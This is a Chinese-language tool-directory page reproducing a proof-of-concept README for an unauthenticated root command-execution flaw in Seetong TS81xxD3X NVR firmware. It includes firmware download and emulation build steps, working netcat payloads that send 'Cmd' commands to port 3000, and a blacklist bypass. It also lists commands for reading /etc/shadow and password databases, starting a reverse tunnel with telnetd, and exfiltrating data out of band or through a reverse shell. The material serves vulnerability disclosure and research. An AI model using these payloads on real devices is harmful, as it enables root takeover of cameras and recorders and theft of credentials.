Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
seetong-ts81xxd3x-rce — CVE-2026-100886 | 未认证远程代码执行工具包。 | Kitploit
工具/GitHubGitHub/heapframe/seetong-ts81xxd3x-rce
嵌入式系统安全物联网安全漏洞分析漏洞利用逆向工程硬件与物联网安全二进制分析远程访问工具固件分析
GitHubheapframe/seetong-ts81xxd3x-rce

seetong-ts81xxd3x-rce

CVE-2026-100886 | 未认证远程代码执行工具包。

5天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库网站

PoC - RLog 调试服务器 RCE(CVE-2026-100886)

该测试框架演示了固件的 libLOG.so 会在 TCP/3000 上启动一个 RLog
服务器。命令调度器分析和动态测试
证明了可通过该服务器实现未经身份验证的操作系统命令执行。

它在 qemu-arm 下加载固件自身的 libLOG.so,调用 TLog_Init()
随后真实服务器绑定到 0.0.0.0:3000,并接受来自任意位置的入站连接,
且无需任何身份验证。

漏洞

该固件在 TCP/3000 上暴露了一个未经身份验证的 RLog 命令服务器。

命令调度器注册了 Cmd,它会将攻击者控制的 输入传递给 TLog_CMD。TLog_CMD 最终调用固件的命令 执行后端。

因此:

Unauthenticated TCP connection
        ↓
RLog command dispatcher
        ↓
Cmd <attacker-controlled command>
        ↓
TLog_CMD
        ↓
mysystem()
        ↓
/bin/sh
        ↓
command execution

文件

  • harness.c:持久化版本:启动服务器并保持休眠(实际使用时请用这个)
  • probe_harness.c:探测版本:还会从模拟器内部尝试命令探测(展示了类型字节分帧要求)

如果下面脚本用于创建 sysroot 的固件下载已不存在。你可以从以下任一来源获取(只需对 nvr 进行图片搜索,该固件广泛分发):

  • https://www.fullward.com/index.php?m=home&c=View&a=index&aid=145
  • http://en.tpsee.com/index.php?md=article&ct=lists&catid=24

我使用的是固件 v4.6.1.4-build202604241011,其他固件版本尚未测试,但像 fullward 这样的下游分销商也有该固件。

构建

在与测试框架相同的目录中运行以下命令

# Download and extract toolchain
wget https://gitlab.arm.com/api/v4/projects/tooling%2Fgnu-toolchains-for-arm/packages/generic/gnu-toolchain/15.3.rel1/arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf.tar.xz
tar -xvf arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf.tar.xz

TC=$(pwd)/arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf

# Creating the sysroot
wget http://www.tpsee.com/upload/firmware/update-ts81xxd3x-v4.6.1.4-build202604241011.bin
binwalk -Me update-ts81xxd3x-v4.6.1.4-build202604241011.bin

mkdir -p sysroot
cp -a "_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_rootfs.ts81xxd3x.extracted/squashfs-root/lib" sysroot/

cp "_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_app.ts81xxd3x.extracted/squashfs-root/lib/libLOG.so" \
   "_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_app.ts81xxd3x.extracted/squashfs-root/lib/libmysystem.so" sysroot/lib/

$TC -march=armv7-a -mthumb -mfloat-abi=soft -nostdlib -ffreestanding -fno-builtin \
    -Wl,--dynamic-linker,/lib/ld-uClibc.so.0 -Wl,-rpath,/lib -Wl,-e,_start -Wl,--export-dynamic \
    harness.c -o harness -L sysroot/lib -lc

该测试框架提供了 libLOG.so 从 edvr 导入的符号的桩实现

运行

qemu-arm -L sysroot ./harness &
sleep 2
ss -tln | grep 3000
# -> LISTEN 0 5 0.0.0.0:3000 0.0.0.0:*  (qemu user-mode forwards the emulated socket to the host)

probe_harness.c 的观察输出(不是上面脚本中使用的那个):

dlopen ok
TLog_Init() -> 0
--- probe port 3000 ---
connect port 3000 OK        (x5 meaning every connection accepted)
REPLY: timeout/none         (plain-text probes ignored: binary type-byte framing required)

使用

➜  seetong-ts81xxd3x-rce printf 'Cmd cat /etc/os-release > /tmp/rlog_os.txt\r\n' | nc 127.0.0.1 3000
^C% 
➜  seetong-ts81xxd3x-rce cat /tmp/rlog_os.txt 
NAME="Artix Linux"
PRETTY_NAME="Artix Linux"
ID=artix
BUILD_ID=rolling
ANSI_COLOR="38;2;23;147;209"
HOME_URL="https://artixlinux.org/"
DOCUMENTATION_URL="https://wiki.artixlinux.org/"
SUPPORT_URL="https://forum.artixlinux.org/"
BUG_REPORT_URL="https://bugs.artixlinux.org/"
PRIVACY_POLICY_URL="https://terms.artixlinux.org/docs/privacy-policy/"
LOGO=artixlinux-logo
➜  seetong-ts81xxd3x-rce 

显示 Artix Linux 是因为 qemu 用户模式共享主机文件系统,而此 PoC 并未正确隔离它。

命令调度器细节

AI 披露,以下文本由 AI 生成

已注册命令(模块 "RLog",LogModuleRegCmd @ 0x8f94)

命令处理函数效果
StartDebug、StartLog、SetLogLevel、Help、StartAutoTest各种日志/自检控制
GetSystemStatus、GetSystemInfo、GetSystemLog、GetSystemCfgTLog_Get*信息/配置/日志泄露
GetSystemFile [abs names]TLog_GetSystemFile (0x7a94) + TLog_SendFile (0x48f0)任意文件读取(/etc/shadow、/usr/local/etc/user.db 等)
GetPrintfFileTLog_GetPrintfFile文件读取
Cmd [System commands]TLog_CMD (0x3680)以 root 身份执行 shell 命令
PortMap on <ip> <port> / PortMap offfcn.00008b76反向 TUN 隧道 + 端口 23 上的 telnetd

TLog_CMD (0x3680) — 远程 shell

  • 复制命令(最多 48 个字符,遇到 ; \r \n 停止)。
  • 黑名单 = 精确匹配 {vi、cd、top、if、killcmd}(strcmp)——可轻易绕过(cat、sh、引号)。
  • 后台模式格式字符串 "%s -b" → 通过 sh -c 运行。
  • 终止辅助字符串:ps -ef | grep "sh -c %s" |grep -v grep、'{print $1}' | xargs kill -9。
  • 执行后端:mysystem()(libmysystem.so)→ IPC 到 /usr/sbin/systemd(伪 systemd,以 root 身份通过 /bin/sh 执行;字符串 "[systemd cmd:]%s"、"[systemd ret:]%d")。

黑名单演示(2026-08-04,模拟服务器):

Cmd vi > /tmp/bl_vi                → dropped (no file created)
Cmd cat /etc/hostname > /tmp/bl_cat → executed (file contains hostname)
Cmd v''i > /tmp/bl_bypass          → BLACKLIST BYPASSED (shell sees `vi`, strcmp sees `v''i`)

PortMap 处理函数(fcn.00008b76)— 隧道 + telnet

  • 解析 PortMap on <ip> <port>(期望 3 个字段)。
  • portmap_client_start(ip, port) (0x88b0):
    • system("lsmod | grep -q '^tun\\b' || insmod /config/modules/4.9.84/tun.ko")
    • 打开 /dev/net/tun,创建接口 tps0,ifconfig tps0 up
    • 读取 /mnt/nand/yun_id.txt、/etc/product_type.txt
    • 成功后:system("touch /usr/local/etc/normal_telnet") (0x897e→0x8982)
  • 处理函数随后运行 system("killall telnetd") (0x8c1e) 和 system("telnetd -p 23 &") (0x8c32)。
  • portmap_client_stop (0x8a48) → system("rm -f /usr/local/etc/normal_telnet")、ifconfig tps0 down。
  • 相关导出:portmap_client_get_status、portmap_client_is_running、portmap_client_get_assigned_ip。
  • 日志字符串:"usage: PortMap on <ip> <port> | PortMap off\n"、"PortMap on: IP=%s, Port=%d\n"、"PortMap start success! ret:%d"、"PortMap stop success!"。

其他值得注意的字符串

  • "rm %s/* -rf" (0xad10) — 由日志目录清理使用(TLog_DeleteLogFile)。

动态验证(2026-08-04)

测试框架(harness.c)dlopen libLOG.so,为其 edvr 导入提供桩,调用 TLog_Init():

dlopen ok
TLog_Init() -> 0

主机侧(qemu 用户模式套接字透传):

LISTEN  0  5  0.0.0.0:3000  0.0.0.0:*  users:(("qemu-arm",pid=...,fd=0))

命令执行证明(纯文本,无认证):

$ printf 'Cmd touch /tmp/rlog_pwned\r\n' | nc <target> 3000        # file created
$ printf 'Cmd id > /tmp/rlog_id.txt\r\n' | nc <target> 3000      # id output captured

两者均在模拟服务器上验证。命令通过 mysystem() → /usr/sbin/systemd → /bin/sh 执行(在设备上为 root)。套接字上不返回任何输出(盲 RCE;请使用带外数据外泄,例如 Cmd cat /usr/local/etc/user.db > /mnt/... 或反向 shell)。

影响: 任何未经身份验证的网络攻击者都可以以 root 身份执行 shell 命令、读取任意文件(包括明文密码数据库和泄露密码的日志),并将 telnet 切换到端口 23。在局域网中这已是致命打击;在暴露于互联网的设备上同样如此。

下载工具